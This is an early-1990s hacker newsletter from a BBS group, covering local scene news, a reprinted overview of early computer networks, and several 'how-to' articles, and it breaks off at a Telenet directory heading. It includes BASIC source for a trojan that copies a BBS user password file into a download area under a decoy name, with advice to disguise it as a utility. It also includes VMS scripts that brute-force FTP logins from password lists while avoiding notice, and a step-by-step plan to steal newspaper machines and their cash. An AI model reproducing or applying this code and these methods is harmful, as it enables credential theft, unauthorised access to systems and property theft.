"It's Alive! It's Alive!" _____________________________________________________________________________ \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ \ Critical Issue # 07 A Technical Text / \ Mass ~~~~~~~~~~~ File Newsletter. / \________________________________|____________________________________/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ __________________________ __________ l___________ | ___________l // \ _______ _____ l|l _____ ______ ___ // /~~~~~~~\_\ l \ l l l|l l l // \ _ l l // / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l <<<< ritical l / l l l|l l l // / / \ l l \\ \ l < l l l|l l l <<<< / ___ \ l l \\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____ \__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l ==--> ==--> ____ __ ____ ==--> <03/26/92> l \ / l ass ==--> l \ / l __ ______ ______ l \ / l / \ / \ / \ A Technical l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ text file newsletter l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~ l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 7 l l l l /_/ \_\ /~~~~ / /~~~~ / ~~~~ ~~~~ ~~~~~~ ~~~~~~ Critical Mass Technical Newsletter is free to those who wish to gain in further knowledge of topics of Telecommunications, Datacommunications, Computer and Phone Security, Software and other forms of piracy, explosives, and other forms of not widely known or talked about topics. All article are totally original, unless stated otherwise. We will not except unoriginal, plagiarized articles, or article that contain false information. We except articles from anyone who is willing to follow these criteria, and as long the editors, writters and S.A.O.O. members feel that the article is worthy to print. We encourage all to download these files and pass them on freely to others as long as credits of the editors, writer or S.A.O.O. is not modified in any way. There is no set date for release issues, but we attempt to put them out as frequently as possible. We now also offer BBS's outside the Tallahassee area to get on our BBS listing. If you decide to get on this list, we will send you issues as soon as they are produced. If you have any questions pertaining to a article, please leave E-Mail to the author of the article. If you cannot get in contact with the author, please leave "The Beaver" mail at the following BBS's, he will try to put you in touch with the author, and/or try to answer your questions. The Beaver The Back Door BBS BlackHawk BBS (904)997-6127 (904)421-9255 Warrior's Retreat Wizard Spell Book (904)422-4606 (904)574-3447 Tower Of Power (904)668-6745 Or, if you have access, one of the following S.A.O.O. BBS's. Hacker Wholesale <904>PRI-VATE Speed Shop <904>PRI-VATE S.A.O.O. Main <904>PRI-VATE If you wish to become a member of the S.A.O.O. please leave The Beaver E-Mail, where he will send you an application for you to fill out. From there, local S.A.O.O. members in your area will consider you and take a vote on if at that date you can become a member. We are always looking for experienced and even non-experienced p/hackers to join. Only after a back-ground check and the vote, will you be let in. If you fail to get in, do not be mad, we have turned down many people. Simply wait, improve the reasons that you where not let in, if possible, and in the mean time, learn. We are also looking into other remote S.A.O.O. support boards to net with and share information with. In the event that you would like to support a S.A.O.O. chapter in your area, please contact a member of the Tallahassee S.A.O.O. Benefits do come. Currently we are looking into mostly the Florida region, from Jacksonville To Miami, but are willing to reach into other areas. Head Chief And Writer - The Beaver Editor - Flea Members - ilicon luminum xidation rganization. This Issues Articles Include: I. - Local News By The Beaver. II. - Network Discriptions By III. - Simple RA BBS User.bbs Trojan By The Beaver IV. - How to support yourself doing little to nothing. By The Beaver, Shadow Hacker, D.M., Section 8, etc V. - Beav's FTP Batch Hacking Method By The Beaver VI - The SAOO Generic Telenet Scan Part II Scanned By The Beaver. VII - Brief discription on really hiding directorys By Dementia Meister VIII - Down and dirty chemistry. Part I By Art Phish VIV - Closing notes. By The Beaver __________________________________ Local News The Beaver _______________________ Hello, and welcome to yet another issue of Critical Mass. Man has it been a great year for hacking for fellow S.A.O.O. members in this area, but we will not go into that right now........ As you might recall, in the first CM, I wrote a editorial on about the downfall of fun and intresting BBS's that allow you to speak freely. I am now happy to say that this is changing rather fast. I have seen more pirate boards, both private and public, pop up in this area, that it almost brings a tear to my eye. This raise a point..... A new BBS echo has hit the ole town of Tallahassee. It is called "[Unregistered] Net", and the primary topic is on Piracy, Hacking, Phreaking, and pretty much any topics that are not talked about in the normal realm of people. It IS however a totally legal net, so basicly this means that there is NO stolen account's/codes/etc traded on this perticular net. If you would like to become a part of this net, please contact 'The Beaver' or 'Section 8' pretaining to information on the net and how to get on. There are currently 5 boards on the net , but we expect three or four more to be on in the near future. If intrested, mail one of the above, and all information will be sent to you. There is also the SAOO net, which will be coming into action soon. In order to be a part of this net, one must be either a active member of the SAOO and/or support a SAOO support BBS. Please contact one of the above for further information. It looks as if the ole Upper Deck will be down longer than expected. So don't call looking for it. When it does come back up however, we will have more storage so that we can carry more files online. The S.A.O.O. Telenet Generic Telenet Scanner Version 1.1i Beta is out, though this is nothing to really brag about. It works, but as stated it is a beta version. As you may have noticed, it came with your issue of Critical Mass#7. As of this time, you are slightly ahead of people how are downloading version 1.0i beta off of Tallahassee BBS's, in that v1.1i beta contains a bug fix. See the Doc's for more information! Also, feel privileged. Currently, there is some talk also about having a local Computer convention of sorts. What is being looked into right now is to have a basic get together of modem users in our area, and hopefully along with outsiders as well. What is desired is a two day long event in which users get together and discuss serval topics, along with speakers in all fields, including computer security. What hopes to be arranged is a 'conference' of sorta, for speakers ranging from MircoSoft to local DEC, FCIC, FDLE and possible FBI computer secuity officals. This is in its very early planing stages. If you wish to help out the efforts, please contacts your nearest S.A.O.O. member! Welp, it looks like ole Abigail Natias is leaving the Tallahassee area and is heading for the Ft. Walton Bch area. He has been a fellow SAOO member since it was founded. Never fear though, he remains in the SAOO, and hopefully, within the next few months, a new SAOO chapter will be opening within that area. There is a new BBS on internet that you might find intresting. It is pretty much a underground BBS, so to obtain information on it, please contact "The Beaver" at one of the given BBS's. _________________________________________ Network Descriptions By ___________________________ Editor Note: This was orginally a message posted on a BBS in Ft. Walton Bch Florida. Unfortunatly, the author is unknown to us, so we cannot give him/her credit. Also, this text is somewhat old so, not all the information is accurate. - The Plethora of Networks - Since I have been at an ARPANET site for about three years, and a USENET site for the same amount of time, I think I can comment on some of the Networks that exist out there. Particularly since Berkeley has become a gateway for several of them. ARPANET ------- Brought to you by the fun folks at DARPA, it was one of the very first experiments with computer networking, and certainly the first on a national (and later international) scale. It is centrally controlled and implicitly routed (i.e. the network figures out how to get from point a to point b). To join, you have to have a gov't sponsor and it is for the execution of official gov't business & research. (sure it is...) In so far as I am aware, all links are faster than 9.6Kbaud, and a good number of them are 56Kbaud. All appear to be dedicated. Number of sites is somewhere between 250 and 300. If you choose to count the whole internet, things get a little bigger. Anyone have any ideas about the number of internet sites? Three basic services are offered by the ARPANET: FTP - File Transfer Program (fetch/send files anywhere) telnet Interactive access to other hosts on the network MAIL Electronic Mail MILNET ------ Stepchild of the ARPANET (or perhaps goosestepping child?), MILNET is where the military sites gather to do the same things ARPANET does, without disruptions caused by networking reseach (i.e. it is a production version of the ARPANET). It split from the ARPANET in October of 1983. CSNET ----- This is a network funded (initially, although they will be self-sufficient later on) for the purpose of Computer Science Research by the National Science Foundation (and probably many others). By self-sufficient', I mean that the individual member sites of CSNET will pay the full cost of central control, administration, and ARPANET access. Last price I was quoted was $30K/year. Presently seems to be between 50-100 sites. I'm a little shaky on what this network has in terms of services, but here goes: Services seem to be limited to MAIL, but FTP is coming. Mail is handled with the MMDF software, which operates over the phone. There are two ARPANET gatways: UDEL-RELAY and RAND-RELAY. These two sites handle the phone traffic to the rest of the net (??) from the ARPANET. Network addressing is implicit. To get to a CSNET site from the ARPANET: mail person.site@RAND-RELAY (or UDEL-RELAY) BITNET ------ This is a network of IBM hosts, and seems to be built along the same lines as the ARPANET (implicit addressing, dedicated lines, central control) but not all the sites have the same capabilites. Services supported: MAIL, and FTP (for those sites that have RSCS). Presently is about 50-60 sites. Founded by CUNY, after they got IBM to cough up the software that is used in the IBM internal VNET. I have no idea how fast it goes. Scope: national. To address someone on the BITNET from the ARPANET: mail person%site.BITNET@BERKELEY BERKELEY's mailer converts this to G:SITE=PERSON and it gets sent to UNIX G (in the UCB Computer Center), which in turn sends it to the IBM 4341 (UCBVMA on the BITNET), and from there it goes where it's supposed to... DEC Engineering NET (E-NET) --------------------------- This is DEC's internal network of engineering machines (now you know where VMS comes from!). It is centrally controlled, semi-implicitly routed (they are converting from an explicit routing scheme) and is composed of somewhere between 2000 and 2100 sites. Primary service seems to be MAIL, but there is no doubt some form of FTP as well. Speed seems to be somewhere in the higher ranges (4800+ baud), but I infer this from speed of mail propagation alone. This network is international in scope, with several European sites. For ARPAnauts, you can mail to the E-NET: mail decwrl!rhea!site!person@BERKELEY The site decwrl' talks to ucbvax' with UUCP. ucbvax' is the ARPANET site BERKELEY. The mailer at decwrl converts address syntax to RHEA::SITE::PERSON and away it goes... There is a DEC site on the ARPANET (DEC-MARLBORO) which appears to do gatewaying duty now and again, but by hand only. This would be an ideal point to establish a real gateway (hint, hint...) (and now, for the grand finale...;drum roll please=) UUCP/USENET (ta da!) -------------------- These two networks are forever intertwined, and from the ARPANET point of view, there is little difference between the two. By the nature of the beast they must be discussed together. UUCP is an acronym for Unix-to-Unix Copy, a file transfer and remote execution facility which operates over a direct line (max 9600baud) or over the phone lines (typically 1200 baud). Mail is transmitted through the network on a pass it on basis, and at present, only the mail software knows how to transfer stuff beyond a site's immediate neighbors. The UUCP network exists because some of my neighbors talk to some of your neighbors, so through them we can send mail to each other. The network has no central control, and no one knows how many sites there are, or how far the network extends. Anyone can join the network, all it takes is a UNIX system, and another site willing to talk to you. After four months of traffic analysis, I have found just over 2000 UUCP sites. USENET is a subset of the UUCP network. On top of the existing UUCP software, sites in this network run netnews', which is a bboard system, also on a pass it on basis. Imagine a bboard system in which you post something, and you pass it on to the other USENET sites you talk to (and so on, and so on, ad nausem), until the whole network has seen the item you posted. The discussions are separated by topic, and if you thought that the ARPANET had a wide range mailing lists, the USENET has currently somewhere between 150-200 active network wide newsgroups discussing things as esoteric as UNIX bugs to mundane things like cooking. There are approximately 600 USENET sites covering the continental US, Canada, Europe, and Australia. There is a USENET directory kept by Karen Summers-Horton (cbosgd!map@BERKELEY), and it is posted monthly on the first of the month to net.news.map. The anarchy of the network is interesting. Among other things, it means that you must have an educated network community (ever try to educate people at 600 sites??) and punitive actions are very nearly impossible on a unilateral scale. It makes path routing difficult, however. The directory includes information about links that a particular site has, but it is up to the site to provide and maintain that information. Since the network is in a constant state of flux, it is very hard to map the whole thing. Unlike the ARPANET, usually the best you can do is get a snapshot. (finis) Now. Where I err, please correct me. Most of the networks mentioned get HUMAN-NETS in one form or another, so I expect that corrections will filter in over the next few days. However, on the whole, I don't think I have missed anything major. For the networkingly confused, I hope I have been of some help. This got just a touch longer than I had anticipated. A bit more info on Digital's ENET First I'd like to thank the author of the compendium on networks. And second, I'd like to give a little more information on the Digital ENET. It is composed of systems running our DECNET software products, first introduced about nine years ago. DECNET is much more than a mail network. It is a product built on a layered network architecture (DNA) with lower, non-programmer accessible data-link and routing layers, and higher, programmer accessible, session layers. It is similar to the ISO model on open systems interconnect. Since it is older than that model, it does not correspond exactly, but will, more and more, as time goes by and as the worldwide networks develop. At the data-link level it can use synchronous or asynchronous lines of any speed running DDCMP, public network lines running X.25, parallel links running protocols specific to those devices, and Ethernet. Using gateway products it can create gateway links into an IBM SNA network. At the user accessible layer, it is possible for any program to open a transparent, full-duplex, channel to any other program on the same or any other node in the network. Programmers can take advantage of this "network logical link" to build any application they wish. Various Digital supported protocols running on logical links are host-to-host terminal connections, allowing a user at any node to act as an interactive terminal on any other node, Mail, the Data Access Protocol, (see next paragraph) and several others. The DAP protocol is used to copy files, but it is much more than a file copy protocol. It permits a program on any system to access a file on any other system as though that file were a local file. In fact, VMS and RSX using the DAP routines buried in RMS permit a nodename to be simply a part of a file spec used by any program. DECNET does a bit more than implicit routing; it does dynamic path routing. As a result, given sufficient alternate paths, the loss of an intermediate node does not affect the operation of traffic currently routing through that node. Dynamic path routing was first made available in DECNET Phase III, offered for sale almost five years ago. For example, since our network has three transatlantic links, a few months ago, we had a serious failure of the links between Massachusetts and the remainder of our engineering and marketing headquarters 30 miles to the north in New Hampshire. But due to the fact that some of our transatlantic links go into New Hampshire and others into Maynard, we did not immediately notice the problem. Things got a bit slower, since we were no longer using several 56Kbps links but were pushing all traffic through some 9600bps links to the U.K., down to Geneva, and back. The reason there occasionally appears to be some implicit routing in our node strings is that the Phase III version of DECNET had a maximum of 256 addresses. This restriction has been lifted in Phase IV. However, as a result of the restriction, it was necessary for us to partition our network. Reassigning node numbers will not be complete for several months, and not all systems will upgrade, so there may be a few systems which require one intermediate hop from RHEA. Many of these will have definitions on RHEA making that transparent to the sender (though a recipient would see the hop). The rest should be directly addressable from RHEA, whether located in the U.S., Canada, the Caribbean, Europe (13 countries now), the Middle East, the Far East, or Australia. (Remember, IBM is the only computer manufacturer larger than Digital.) Compliments to Mr. Fair - an excellent summary article. Would that Human-Nets had more such. To expand on CSNET: It is currently funded by the NSF, and expects to become self-supporting during the next few years, based on member fees. These fees are: $ 30,000 - commercial sites $ 10,000 - government and not-for-profit $ 5,000 - educational These fees may be reduced by petitioning for a reduction in the case of small outfits, and are lower for people who already have a net connection via Arpanet. The CSNET membership list as of Dec. 1 shows: 85 Phonenet sites 6 Telenet sites 18 Arpanet sites 4 CSNET-owned hosts Not all of these sites are operational yet, though most are. Phonenet sites are served by two Relay machines, which call them up nightly to exchange mail. Text files may be automatically transferred using MMDF-based mail-receipt programs, though this is obviously not the best way to do business. Bandwidth here is limited by the 1200-baud phone lines as well as by the capacities of the Relays. Mailing-list stuff can be handled OK, but Usenet traffic breaks the Relays by sheer load. Telenet sites run TCP/IP on top of X.25 virtual circuits, using software developed for CSNET at Purdue. Personally I think this is hot stuff. If your phone bills are $1500/month, you can run equivalent traffic over Telenet for about $1200/month, last time we figured it out. And, you get full Internet connectivity and services into the bargain. Because the drop lines from Telenet to the host are really only 9600, 4800, or 1200 baud dedicated phone lines, instantaneous bandwidth is not as good as Arpanet, but it's not bad. And, you and the rest of the world will be hard-put to tell that you're not on Arpanet directly, except you don't have to deal with the DoD. This software really works, and works well. Arpanet sites run standard Arpanet software - no change. In addition to simple net connectivity, CSNET brings the benefits of centralized network management. Basically this means that if your mail isn't moving, you have experts to scream to, and they really will work hard to fix the problem. There are other benefits such as ongoing mail system development, an automatic nameserver, and so forth. Management of CSNET has recently been transferred away from the contractor committees which built the net to a newly-formed Executive Committee, which is overseeing the move from a research to a service organization. The two relay machines are moving to BBN - it's cheaper and easier to run a single computer center and communicate via WATS lines than to spread out the Relay operations. Just to clarify something... DECNET is the name of a product sold by Digital which any customer can use to build their own network. DECNET is used to build Digital's internal network. The internal network name has been a hotly debated subject (what's in a name?) but the most commonly used name is the ENET, since the largest internal use was within Engineering. Now the whole company is being interconnected, and Engineering Network is not really an appropriate name. But the E in ENET doesn't necessarily have to stand for Engineering. We think it can stand for Everthing, Employee, Everywhere, or whatever anyone wants it to stand for. The lack of any serious central control (other than a nodename registry) makes things like this not really matter. Here's a network you left out: the XEROX Internet. Most outsiders tend to overlook the XEROX Internet, for various reasons: 1) only a small proportion of the traffic is gatewayed to or from other networks; 2) what little gatewaying there is gets done almost invisibly; 3) the name difficulty. (I'm told that XEROX used "Internet" first, but that doesn't matter much now.) The XEROX Internet only has about 2000 users, but it is widely distributed, with users in Europe and Japan. The mail transport mechanism within the XEROX Internet is called Grapevine. Grapevine addresses look like ".". If the registry you're sending to is the one you are in, you can leave it off, and the address becomes merely "". Registries are geographic - the two largest are "PA" (Palo Alto), for Northern California, and "ES" (El Segundo), for Southern California. To send mail in from the ARPAnet, the address looks like: ".@PARC-MAXC". If the registry is PA, you can leave it off, giving "@PARC-MAXC". This is what I mean by invisible gatewaying - to outsiders, it looks like all 2000 of us Xeroids receive our mail on poor little PARC-MAXC. Not so - it's just a gateway. I think the source of the confusion is that people are used to explicitly specifying a host for the mail to be delivered to, as well as a user on that host. Grapevine's mail servers are politely invisible. Sending mail out to the ARPAnet is as easy as pi. "ARPA" is just another registry, so I just say "@.ARPA". Or if I'm really lazy, I can just say "@", since anything with at atsign automatically goes to the ARPAnet. In addition to the networks previously described, there are five public data networks actively serving the US and more in the works. The five national PDNs are all common carriers, like Greyhound - that is, anybody whos pays the fare can use them. They all provide an X.25 interface, which gives a virtual circuit service - there is as yet no international standard for mail or FTP. All provide a virtual terminal capability via the X.3/X.29 PAD standards. They all compete vigorously for business, and I'm sure I'll hear about it immediately if I have left out anybody's capability. Here (in alphabetical order) are the five established PDNs: ADP Autonet 175 Jackson Plaza Ann Arbor, MI 48106 (313) 769-6800 Besides the US, has satellite links to London, England and Delft, The Netherlands. Maximum internal speed is 9600 bps. Nodes are PDP-11s with KMC-11 front end microprocessors. Internal protocol was described to me as derivative of the old ARPAnet protocols. CompuServe Incorporated Network Services Division 5000 Arlington Centre Blvd. P.O. Box 12 Columbus, OH 43220 (614) 457-8600 Internal speeds to 56k bps. Nodes are PDP-11s with 6809 microprocessor front ends. Internal protocol is DDCMP. GTE Telenet Communications Corp. 8229 Boone Boulevard Vienna, VA 22180 (703) 442-1000 Internal speeds to 56k bps. Nodes are arrays of 6502s in a redundant, load sharing configuration. Internal protocol conforms to CCITT Recommendation X.75. Supports automatic recovery of virtual circuit when a node fails during a call. Built by some of the folks from BBN who built the ARPAnet originally. Provides a mail service called Telemail. Tymnet, Inc. 2710 Orchard Parkway San Jose, CA 95134 (408) 946-4900 Internal speeds to 56k bps. Nodes are arrays of "Tymnet Engines" in a redundant, load sharing configuration. The Tymnet Engine is a Tymnet-built 32-bit processor derived from the Interdata 732, re-engineered for extremely high MTBF. Internal protocol is a unique Tymnet design which repacketizes inside the network and does flow control at the byte level, like TCP. Supports automatic recovery of virtual circuit when a node fails during a call. Provides a mail service called OnTyme. Uninet United Telecom Communications, Inc. 2525 Washington Kansas City, MO 64108 (816) 221-2444 Internal speeds to 56k bps. Nodes are Modcomp 7830s. Internal protocol is a Uninet-designed virtual circuit protocol, on top of HDLC. In addition there is, of course, the new AT&T offering, NET/1000. Nodes consist of arrays of VAXen with a Series/I for line handling. They see the function of their network as storing information, rather than just forwarding it like the other networks. The internal protocol is X.25, but they don't support an X.25 user interface! (No, I don't know why). For further information, call Mr. John M. Finn, their San Francisco account executive at (415) 452-7292. Graphic Scanning and Computer Sciences Corp. are in the process of spinning off their internal networks, as GraphNet and InfoNet respectively I believe. There will probably be X.25 interfaces, if they don't exist already. GE Information Services Company has an internal network called MARK*NET. There is not as yet an X.25 interface to it. And, how could I forget, the State of Utah boasts its own Public Data Network! It is called ComWest and is being spun off by Blue Cross/Blue Shield of Utah, which needed a good way to get claims data from places like Panguitch, Utah up to Salt Lake City. The internal circuits are leased from Mountain Bell (no, they're not barbed wire, skeptics) and run up to 9600 bps. Nodes are Dynatech Packet Technology Multi-Switch.25 packet switches, which are based on the Z80 micro. There are several sites besides BC/BS, one of them being the University of Utah DECSYSTEM-20. Outside the US, there are public data networks operating in about forty foreign countries, basically the ones that are industrialized. We have a user who logs in regularly from Stockholm via the Swedish PDN <-> Telenet <-> ComWest. He says he gets good response. _______________________________________ The Simple RA User.BBS Trojan. By The Beaver _____________________________ Member S.A.O.O. The entire idea behind the code is simple. To get the User.BBS file, which contains all the user's and there passwords . It is currently set for RA, but can probably be modified for Qbbs, or what not.... Here is the little "ho-down" on the program and it's steps. 1> Find RA's User.bbs file, using the program "dirscan.com" Once found, store the path. 2> Find a file that you are SURE is in a files transfer area. Take for instance, if you know that there is a file in the Utilities area called "bigdeal.zip", and you want the User.BBS file to go in that directory, we search for "bigdeal.zip", and store the path it came from. 3> copy the User.BBS to the file transfer area as something non- suspision. So if it copys, as in our example, to the utility directory, make it something like, "list.com" it is copied. 4> Call everyday and do a "raw directory" and look for the file. Since the files.bbs is not modifed, it will not be seen on a normal file list, so a raw is required. If raw-directory is not supported, then simply go on everyday and try to download the name it is stored under. In our case, "list.com". If it is there, whether or not it is in a standard file list, it can be down- loaded. The "diskscan" program is nothing more than a utility like, "where". Basicly all it does it find files for you. This should not be a very hard utility to find. Once you obtain the user file, you should have no problem with a text editor going though and determining what the username and passwords are, along with other information. If you are of thoughs neat types, you can get RA or the utility "rauser.exe" and rename your physdo utility back to "users.bbs" and with a few little modification, you can use the utility that looks though that and gathers the fields. Anyrate, I hope you enjoy this, but it real was not that hard to do. Actually, Dementia Meister is writting a better version of this in pascal, but I am sure you can figure it out and convert it to whatever laugage you so desire. Also, I would like to note the fact that this is not a very easy bug to cure, and I see no what for sysops to protect themselve from the use of this method, other than having a careful eye. . Member S.A.O.O. < Leave mail on membership > < Only the worthy hack's > < need apply! > ---====--- ' This is version 1.0 of the RA user.bbs trojan horse. ' Object.... To find users.bbs and copy it to a download ' area, so that it maybe download, thus all usernames and passwords ' are obtained. ' ' This program uses "dirscan.com" file finder. ' ' Written By The Beaver SHELL "dirscan users.bbs >me" ' Find User.bbs with full path ' and put it in a file called ' "me". OPEN "me" FOR INPUT AS #1 INPUT #1, userbbs$ ' Grab Path out of the file. CLOSE #1 ' okay, we are done. KILL "me" ' kill the "diskscan" output file SHELL "dirscan (filename) >me" ' Now find the file transfer area. ' we search for a file we KNOW is ' there. ' Replace the (filename) with a ' file that you know is in the ' download directory OPEN "me" FOR INPUT AS #1 ' Grab path out of file again. INPUT #1, filetrans$ ' Okay, got it! CLOSE #1 KILL "me" ' kill the "diskscan" output file FOR i = LEN(filetrans$) TO 1 STEP -1 IF MID$(filetrans$, i, 1) = "\" THEN a = i: GOTO step2 NEXT i step2: filepath$ = LEFT$(filetrans$, a) ' okay, we got the file area ' path we need. Now do the ' dirty deed. SHELL "copy " + userbbs$ + " " + filepath$ + "neatgame.exe >me" KILL "me" ' the ">me" keeps output from going to the screen ' . All output to ' con. is redirected to a file. We are killing this ' file ' Also, make the "neatgame.exe" to what ever file ' you desire to call it. ' From this code, I advise a few things. This is only raw source. ' Add in a few nifty things, so it appears as a virus scanner or ' maybe a disk doctor or something. Just add in print statements ' here and there. Plus, as some sort of disk utility, all the hard ' disk access can be explained! _______________________________________________________________ How to support yourself doing little, or nothing at all. By Bored SAOO Members Late One Night ___________________________________________ Here we will discuss the infamous "Democrate Fraud" method. I take no resposiblity for any prosecutions, damages, injuries, etc. Attempt at your own risk... Though, this method has never been tested, along with myself and five fellow SAOO members thought of this while sitting around a dead Democat Paper Dispenser. Simply follow the following steps.... 1> Getting the Machine Get you hands on a Democat Paper Machine. To do this, take three of your fellow comrades in one vechicle, with a large back seat/trunk and approach a nice, lonely paper machine. Get two people to grab it while one watchs out. If the machine is bolted down, use bolt cutters. 2> Opening it Cut the lock off that secures the brace pin . Remove the brace pin and "open de hatch". Remove the money. Replace the lock and secure with new lock. * NOTE: Do not beat it open! It will only serve as a nice plant stand, or as it was at Abigail's house, "That thing in the corner." 3> Re-distribution of wealth There is still more money to be made. Now, take the paper machine and drop it off in a somewhat populated area. Not in a place so populated that the real paper men will see it, but in a back area . In other words, where the real paper man won't see it. Now, every morning goto a paper stand and put in your 50 cent <$1.50 on Sundays!> and remove ALL the papers. Now return to YOUR paper stand and put in all the papers you just got into your paper machine with your lock on it! Now, every night, return and unlock your paper stand and collect your money! Repeat this process and distribute your stands around as much as possible. Start this entire process over again.... 4> Closing notes..... Though past experiences of certain members of the SAOO , they got a whole $5.00 on a stolen machine . The machine they got was in a area not to populated. We estimate that a real popular area, you could maybe get out of one box $15 dollars. This is a problem, the paper people already got boxes there. We figure that a box in a more ideal area for you will probably will average $7.50 on weekdays. Sudays are another story. You might make a possible $20 dollars for that day. So for one box, in a decent location, adverage is...... Week : $65.00 Month : $260.00 Year : $3120.00 With this in effect, lets say you can operate 5 Boxes max, safely and effectively. Lets average that.... Week : $325.00 Month : $1300.00 Year : $15,600.00 Which is, of course, tax free. This should be efficent to keep up with most of your bills and whatnot. With a real job, you could make real money! Or, if you are unlike me, collect welfair and live like a king! Welp there you go! ---====--- Idea conceived by SAOO members - The Beaver, Shadow Hacker, Abigail, Dementia Meister and Section 8. Thought up just before before getting rid of a beat up box and hacking on machines at Utaha and Miami Fl. ______________________________________________________________ The VAX/VMS FTP Batch Hack. Written By The Beaver ________________________________________________ When I came up with this method about a year and a half ago, I never knew how good it would work out for me. I have cracked more accounts using this method than I can possibly think of. In order to use this method, one must of some sort of programming knowlege and understand, at least somewhat, how VMS works. First off, let me briefly explain the method before we actually go into coding or anything like that. FTP is used as a file transfer method from one machine to another. What really makes this great is that any machine that supports FTP can be hacked using this method. This means that you can use you hacked VMS system to hack any other system that supports FTP that runs any OS! Heres how the idea came to me. One night, I was hacking on a VMS system somewhere on the Internet, and I remembered that everytime you fail a account, the user is notified that there was a invald login attempt, and if you have to many invalid attempts in a given time, bells and whistles go off, telling the operator that a "breakin" is in progress. This can be a real bummer. Well I got to thinking that this "front door" hacking was really becoming a drag, then it dawned on me. No logs or records of invalid attempts are recorded by FTP, which you have to "login" to send files to the remote machines! Now I'm set. I'm hacking like hell, the another idea "spawn's" on me. What if I upload a ton of commonly used passwords, write a program that will create a batch job that will attempt all the passwords on the accounts that I was hacking. Then I could "submit it" and let it hack for me? Trust me, it worked like a dream. From that, I came up with tons of variations of the program. Well, lets get started with the technical info. All the code was written under VMS BASIC, because everybody and there grandmothers knows BASIC. The first example it a hack over internet on a single account with a password list. 5 on error goto 50 ! This will Catch EOF 10 user$="bob" ! This is ther username open "passwords.dat" for input as#2 ! Open File w/ Favorite Passwds open "hack.bat" for output as#1 ! Our Batch That Will Hack. 10 input#2, pass$ ! Grab A Password 20 print#1,"$ ftp /user="+username$+" /pass="+pass$ 30 print#2,"quit" ! Where Tried Our Password, Now Quit. 40 goto 20 ! Do It All Over Again. 50 resume 51 51 close#1 ! Got The EOF, now close close#2 ! up and exit. end That simple. We now have a file called "hack.bat", which will do our hacking for us. Ok, so we are ready to kick it off. Type the following. Submit hack.bat /noprint / notify Now, let me explain a little more. In line 20, where we FTP to the desired address, you must keep the "$" in there. If it is removed, the Batch job will not work correctly. This tell the VAX that this is a DCL level command, so it must stay. There is none in front of the "quit", because by then, we are not at DCL, but rather, we are using the FTP program. Heres something very important to remember also. When you "submit" the batch job, make sure the "/noprint" is present! This tells the system NOT to dump batch information to the printer. If you don't do this, everyone in the computer center will see what you are up to! That ain't cool! The "/notify" is optional. This will simply tell you when your batch job has completed. Now, while its doing its thing, go off and do something else for a while . Okay, the batch job completes, now you want to extract all the cool information. You will notice that there is a big, fat log called "hack.log". This is a record of everything that happened in our batch job. Now we check to see if we got in or not. This part you might have to play with. I use the VMS "search" command at this point, like thus........ Search hack.log logged This will search the entire log for the work "logged". So if it finds one, it will display the line that had that word. What we are looking for is the nice key words "logged in". From here it will dump to you whether you suceeded in logging in or not. One problem, it will only show that line, so you might have to whip-up another BASIC program that will search for all the important lines that contain the information you want . There ya have it! Possible hours of work all nicely automatied for ya! The only problem? There will be a FTP logged stored in the targets directory. No big deal, you have there password, go over and delete it. The following is more code, with a brief discription of what it does. All "submits" should be done like before. 5 on error goto 100 ! Catch That Thare EOF 10 open "usernames" for input as#1 ! Open A List Of Usernames open "hack.bat" for output as#2 ! Opens Our Work Horse 20 input#1,user$ ! Get a Username 30 print#2,"$ ftp /user="+user$+" /pass="+user$ 40 print#2,"quit" ! Try Then Quit FTP 50 goto 20 100 resume 111 111 close#1 ! Got The EOF, Now 112 close#2 ! Close Up The Files 113 end This is the one I find that is most successful! It trys the persons username as a password. This works real nice on VAX/VMS systems, because VMS accounts usually default there passwords to the username! In one case, using this method, I cracked 166 account on a system in Utah! No shit! 5 on error goto 200 ! Handles Them EOF's 10 open "username.dat" for input as#1 ! Opens Username File open "password.dat" for input as#2 ! Opens Password File open "hack.bat" for output as#3 ! Our Electro-Hacker Hero 20 flag=1 ! Determines Who Got The input#1,user$ ! EOF 30 flag=2 ! Determines Who Got The input#2,pass$ ! EOF 40 input#3,"$ ftp /user="+user$+" /pass="+pass$ print#3,"quit" ! Try and exit 50 goto 30 200 resume 210 210 if flag=2 then ! If At The End Of Pass close#2 ! File, Close It, Get open "password.dat" for input as#2 ! Another User And goto 20 ! Start Over 220 if flag=1 then ! If At The End A User close#1 ! File, Close And Exit. close#2 close#3 end Okay, that should pretty much cover your needs. There are only a few drawbacks to FTP Batch Hacker. It sometimes requires a bit of disk space, so is you have a disk quota of a hundred blocks, forget about it. I would also like to say that when you actually use this method, It would be very wise to change the names for the files used by the programs above. After all, it don't look to cool to have "passhacker.bat" in the queue for all to see! Yesh! Before I end this article, I would like to include one more detail that works really nice with this method. Lets say your on this really nice VAX/VMS and ya want to keep you access there as long as possible. What you need is as many accounts as possible. Heres what I do, type the following at DCL........ Type sys$common:[sysexe]rightslist.dat This will dump all usernames along with alot of random ctrl characters. Capture this, and write a filter and re-upload the nice clean userlist. After that, run one of these guys with the user's you got and I can almost bet ya that you will get at least a few accounts. This works really great when you use the DECNET to jump on other systems that are a part of the network! You can Sometimes crack open a entire cluster . Well, thats all there is to it. That simple and fun. Also, if anyone writes a good filter for rightslist ON a VMS system, I would very much like to see your code, because I have had one hell of a time getting one to work myself....... Note: After producing this article, I found out why the FTP never makes logs of invalid attempts. The reason is because because most of the time the people who have setup the system have not went though all the security means to keep stuff like this from happening. Not to worry though. I have only seen one system out of about 100 that actually had there FTP server setup right. The reason that they had it setup right was because they where FTP hacked so many times by fellow SAOO members, that they figured it out. Those people are at FSU, so don't hack on 'em or use this method on 'em. They got enough problems as it is. If you do not wish to write your own Rightslist filter, there are ton of RL filters written by SAOO members. They are Phill , Written by Dementia Meister and Abigail Natias, and also RIF , which is written in C. Created by Laiazon and Tech advisor - The Beaver. 1992 ---====--- ______________________________________________ l l l Generic SAOO Telenet Directory l l Part II l l 